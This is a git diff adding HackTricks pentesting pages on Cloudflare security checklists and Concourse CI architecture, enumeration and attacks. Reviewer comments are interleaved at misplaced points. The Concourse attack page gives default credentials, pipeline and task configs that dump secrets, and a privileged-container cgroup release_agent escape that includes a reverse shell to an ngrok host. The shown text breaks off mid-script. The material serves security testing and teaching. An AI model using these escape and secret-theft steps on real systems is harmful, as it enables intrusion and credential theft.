+{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md new file mode 100644 index 0000000000..7eb00f0bac --- /dev/null +++ b/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md @@ -0,0 +1,159 @@ +# Cloudflare Domains + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
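Review bot: in the cloudflare-security/README.md hunk, the redirect bullet `Check also for **sensitive hidden endpoints** that you contain interesting info` should read `that could contain interesting info`. In the Manage Account section, `whenever possible is **recommended** to use the **Enterprise plan**` is missing its subject (`it is recommended`) and should carry the reason the hunk itself gives: only the Enterprise plan exposes the additional roles linked just above, so on any other plan every member is an Administrator or Super Administrator and least privilege cannot be applied. `check which **members** has **2FA enabled**` should be `have`. The bullet `try to **impersonate a cloudflare notification** to a third party` is ambiguous about the target; it should say the test is against the system consuming the webhook (the destination listed in the previous bullet), since a receiver that trusts the payload without checking where it came from is what would make injection possible. The destinations bullet should also say why basic-auth credentials in a webhook URL matter: the URL is readable by every account member who can view notification destinations, so it is a credential-exposure finding, not just a hygiene point.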
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +### Overview + +* [ ] Get a feeling of **how much** are the services of the account **used** +* [ ] Find also the **zone ID** and the **account ID** + +### Analytics + +* [ ] In **`Security`** check if there is any **Rate limiting** + +### DNS + +* [ ] Check **interesting** (sensitive?) data in DNS **records** +* [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) +* [ ] Check for web pages that **aren't** **proxied** +* [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address +* [ ] Check that **DNSSEC** is **enabled** +* [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** + * This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings +* [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) + +### **Email** + +TODO + +### Spectrum + +TODO + +### SSL/TLS + +#### **Overview** + +* [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. +* [ ] The **SSL/TLS Recommender** should be enabled + +#### Edge Certificates + +* [ ] **Always Use HTTPS** should be **enabled** +* [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** +* [ ] **Minimum TLS Version should be 1.2** +* [ ] **TLS 1.3 should be enabled** +* [ ] **Automatic HTTPS Rewrites** should be **enabled** +* [ ] **Certificate Transparency Monitoring** should be **enabled** + +### **Security** + +* [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. + * The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. 
+* [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used +* [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare +* [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** +* [ ] In the **`Settings`** section: + * [ ] Check that the **`Security Level`** is **medium** or greater + * [ ] Check that the **`Challenge Passage`** is 1 hour at max + * [ ] Check that the **`Browser Integrity Check`** is **enabled** + * [ ] Check that the **`Privacy Pass Support`** is **enabled** + +#### **CloudFlare DDoS Protection** + +* If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. +* In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. + * If the attack is from a **verified bot**, at least **add a rate limit** to bots. + * If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. + * You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. + * Check if **Managed rules** could also help to prevent vulnerability exploitations. + * In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** +* In DDoS you could **override some rules to make them more restrictive**. +* **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. 
+* In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled +* In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** + +### Access + +{% content-ref url="cloudflare-zero-trust-network.md" %} +[cloudflare-zero-trust-network.md](cloudflare-zero-trust-network.md) +{% endcontent-ref %} + +### Speed + +_I couldn't find any option related to security_ + +### Caching + +* [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** + +### **Workers Routes** + +_You should have already checked_ [_cloudflare workers_](./#workers) + +### Rules + +TODO + +### Network + +* [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** +* [ ] **`HTTP/3 (with QUIC)`** should be **enabled** +* [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** + +### **Traffic** + +TODO + +### Custom Pages + +* [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) + +### Apps + +TODO + +### Scrape Shield + +* [ ] Check **Email Address Obfuscation** is **enabled** +* [ ] Check **Server-side Excludes** is **enabled** + +### **Zaraz** + +TODO + +### **Web3** + +TODO + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md new file mode 100644 index 0000000000..85b037522e --- /dev/null +++ b/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md @@ -0,0 +1,87 @@ +# Cloudflare Zero Trust Network + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
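Review bot: in the cloudflare-domains.md hunk, the DNS bullet `Check that **CNAME Flattening** is **used** in **all CNAMEs**` with its sub-point that it `could be useful to **hide subdomain takeover vulnerabilities**` presents obscurity as a control: flattening stops the CNAME target from appearing in DNS answers, but a dangling target is still claimable and the flattened answer will then resolve to whatever the attacker registers, so the checklist item should be to remove or re-point dangling CNAMEs, with flattening mentioned only as something that reduces enumeration. In the SSL/TLS overview, `should be **Full** or **Full (Strict)**` should recommend Strict only; Full encrypts the edge-to-origin leg but does not validate the origin certificate, so it does not achieve the stated goal and leaves the origin leg open to interception. The bullet `Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address` should say why it matters: a directly reachable origin bypasses every WAF, rate-limit and DDoS setting enumerated in the Security section of the same page, so the origin should accept traffic only from Cloudflare. Wording: `admin173865324.domin.com` (domain), `This is could be useful`, `If you protecting some API`, `block requests that doesn't come from a web page`, and the run-on `Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**` should be split into two items. The Network bullets on `HTTP/2 to Origin` and `HTTP/3 (with QUIC)` read as performance advice rather than security findings; either state the security rationale or drop them from the checklist.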
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +### Analytics + +* [ ] Useful to **get to know the environment** + +### **Gateway** + +* [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. + * If used, **policies** could be created to **restrict** the access to malicious sites. + * This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. + +### Access + +#### Applications + +On each application: + +* [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. + * To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) +* [ ] Check the **available identity providers** and make sure they **aren't too open** +* [ ] In **`Settings`**: + * [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) + * [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. + * [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** + +#### **Access Groups** + +* [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. +* [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. + * Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. 
+ +#### Service Auth + +* [ ] Check that all service tokens **expires in 1 year or less** + +#### Tunnels + +TODO + +### My Team + +TODO + +### Logs + +* [ ] You could search for **unexpected actions** from users + +### Settings + +* [ ] Check the **plan type** +* [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** +* [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/README.md b/pentesting-ci-cd/concourse-security/README.md new file mode 100644 index 0000000000..bc438e1de9 --- /dev/null +++ b/pentesting-ci-cd/concourse-security/README.md @@ -0,0 +1,59 @@ +# Concourse Security + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
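Review bot: in the cloudflare-zero-trust-network.md hunk, the Applications sub-bullet `Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP` is ambiguous: as written it reads as if the cookie hardening applies only to plaintext HTTP applications. It should say that the three settings apply to self-hosted web applications, as opposed to applications reached through the browser rendering mentioned in the following bullet. The CORS bullet `check it's **secure** and it isn't allowing everything` should name the actual check: an explicit origin allow-list and no wildcard origin combined with credentials. Grammar: `all service tokens **expires** in 1 year or less` (expire), `the **credits card owner name**` (credit card), `remove users that doesn't really use this service` (don't). The Settings bullet that lists card owner name, last four digits, expiration and address is an information-exposure finding about what any account member can read and should be labelled as such rather than sitting between the plan-type and seat-expiration items.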
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) + +## Concourse Architecture + +Learn how the concourse environment is structured in: + +{% content-ref url="concourse-architecture.md" %} +[concourse-architecture.md](concourse-architecture.md) +{% endcontent-ref %} + +## Concourse Lab + +Learn how you can run a concourse environment locally to do your own tests in: + +{% content-ref url="concourse-lab-creation.md" %} +[concourse-lab-creation.md](concourse-lab-creation.md) +{% endcontent-ref %} + +## Enumerate & Attack Concourse + +Learn how you can enumerate the concourse environment and abuse it in: + +{% content-ref url="concourse-enumeration-and-attacks.md" %} +[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/concourse-architecture.md b/pentesting-ci-cd/concourse-security/concourse-architecture.md new file mode 100644 index 0000000000..c2a08a80f2 --- /dev/null +++ b/pentesting-ci-cd/concourse-security/concourse-architecture.md @@ -0,0 +1,64 @@ +# Concourse Architecture + +## Concourse Architecture + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) + +### Architecture + +![](<../../.gitbook/assets/image (187).png>) + +#### ATC: web UI & build scheduler + +The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). + +The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. + +#### TSA: worker registration & forwarding + +The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). + +The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. + +The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). + +#### Workers + +In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). + +* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. 
+* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. + +## References + +* [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md new file mode 100644 index 0000000000..4cdbcc7d09 --- /dev/null +++ b/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md @@ -0,0 +1,474 @@ +# Concourse Enumeration & Attacks + +## Concourse Enumeration & Attacks + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
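Review bot: in the concourse-architecture.md hunk, the Workers bullets `usually run in **port 7777** via **HTTP**` and `usually run in **port 7788** via **HTTP**` give the impression that Garden and Baggageclaim are network-reachable services; the TSA section of the same hunk describes it as doing `worker registration & forwarding`, so the text should state that the ATC reaches these two APIs through the SSH connection the worker opens to the TSA rather than over a directly exposed port. That also makes the later statement in this patch's enumeration page, that Garden is only exposed locally, consistent with this page. Typos: `**Container Manage AP**I` should be `**Container Management API**` with the bold closed correctly, and `is to continuously checks for new versions` should be `check`.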
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### User Roles & Permissions + +Concourse comes with five roles: + +* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. +* **owner**: Team owners can **modify everything within the team**. +* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. +* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. +* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. + +{% hint style="info" %} +Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) +{% endhint %} + +Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. + +### Vars & Credential Manager + +In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\ +[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ +The **optional \_secret-field**\_ specifies a field on the fetched secret to read. 
If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ +Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. + +#### Static Vars + +Static vars can be specified in **tasks steps**: + +```yaml + - task: unit-1.13 + file: booklit/ci/unit.yml + vars: {tag: 1.13} +``` + +Or using the following `fly` **arguments**: + +* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. +* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. +* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. +* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. 
+ +#### Credential Management + +There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ +Moreover, Concourse supports different credential managers: + +* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) +* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) +* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) +* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) +* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) +* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) +* [Caching credentials](https://concourse-ci.org/creds-caching.html) +* [Redacting credentials](https://concourse-ci.org/creds-redacting.html) +* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) + +{% hint style="danger" %} +Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. +{% endhint %} + +### Concourse Enumeration + +In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file. 
+ +#### Login and Current User enum + +* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: + * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` +* Get configured **targets**: + * `fly targets` +* Get if the configured **target connection** is still **valid**: + * `fly -t status` +* Get **role** of the user against the indicated target: + * `fly -t userinfo` + +{% hint style="info" %} +Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. +{% endhint %} + +#### Teams & Users + +* Get a list of the Teams + * `fly -t teams` +* Get roles inside team + * `fly -t get-team -n ` +* Get a list of users + * `fly -t active-users` + +#### Pipelines + +* **List** pipelines: + * `fly -t pipelines -a` +* **Get** pipeline yaml (**sensitive information** might be found in the definition): + * `fly -t get-pipeline -p ` +* Get all pipeline **config declared vars** + * `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` +* Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): + +```bash +rm /tmp/secrets.txt; +for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do + echo $pipename; + fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; + echo ""; +done +echo "" +echo "ALL SECRETS" +cat /tmp/secrets.txt | sort | uniq +rm /tmp/secrets.txt +``` + +#### Containers & Workers + +* List **workers**: + * `fly -t workers` +* List **containers**: + * `fly -t containers` +* List **builds** (to see what is running): + * `fly -t builds` + +### Concourse Attacks + +#### Credentials Brute-Force + +* 
admin:admin +* test:test + +#### Secrets and params enumeration + +In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them. + +#### Session inside running or recently run container + +If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using: + +```bash +fly -t tutorial intercept --job pipeline-name/job-name +fly -t tutorial intercept # To be presented a prompt with all the options +``` + +With these permissions you might be able to: + +* **Steal the secrets** inside the **container** +* Try to **escape** to the node +* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) + +#### Pipeline Creation/Modification + +If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example: + +```yaml +jobs: +- name: simple + plan: + - task: simple-task + privileged: true + config: + # Tells Concourse which type of worker this task should run on + platform: linux + image_resource: + type: registry-image + source: + repository: busybox # images are pulled from docker hub by default + run: + path: sh + args: + - -cx + - | + echo "$SUPER_SECRET" + sleep 1000 + params: + SUPER_SECRET: ((super.secret)) +``` + +With the **modification/creation** of a new pipeline you will be able to: + +* **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) +* **Escape** to the **node** (by giving you enough privileges - `privileged: true`) +* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) +* **Delete** created pipeline + +#### Execute Custom Task + +This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just 
execute a custom task** (which will probably be much more **stealthier**): + +```yaml +# For more task_config options check https://concourse-ci.org/tasks.html +platform: linux +image_resource: + type: registry-image + source: + repository: ubuntu +run: + path: sh + args: + - -cx + - | + env + sleep 1000 +params: + SUPER_SECRET: ((super.secret)) +``` + +```bash +fly -t tutorial execute --privileged --config task_config.yml +``` + +#### Escaping to the node from privileged task + +In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". + +In the following PoC we are going to use the release\_agent to escape with some small modifications: + +```bash +# Mounts the RDMA cgroup controller and create a child cgroup +# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist" +# It's because your setup doesn't have the memory cgroup controller, try change memory to rdma to fix it +mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +# Enables cgroup notifications on release of the "x" cgroup +echo 1 > /tmp/cgrp/x/notify_on_release + + +# CHANGE ME +# The host path will look like the following, but you need to change it: +host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs" + +## The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command: +#/dev/vda1 on /scratch type ext4 (rw,relatime) +#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime) +#/dev/vda1 on /etc/hosts type ext4 (rw,relatime) +#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime) + +## Then next part I think is constant "hostpath-provisioner/default/" + +## For the next part 
"concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed +# "concourse-work-dir" is constant +# "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API) +# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number) + +## The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant +# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like: +# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028 +# the UID is the part we are looking for + +# Then the host_path is: +#host_path="/mnt//hostpath-provisioner/default/concourse-work-dir--worker-/overlays//rootfs" + +# Sets release_agent to /path/payload +echo "$host_path/cmd" > /tmp/cgrp/release_agent + + +#==================================== +#Reverse shell +echo '#!/bin/bash' > /cmd +echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd +chmod a+x /cmd +#==================================== +# Get output +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd +#==================================== + +# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" + +# Reads the output +cat /output +``` + +{% hint style="warning" %} +As you might have noticed this is just a [**regular release\_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node +{% endhint %} + +#### Escaping to the node from a Worker container + +A regular release\_agent escape with a minor modification is enough for this: + +```bash +mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +# Enables cgroup notifications on release of the "x" cgroup +echo 1 > 
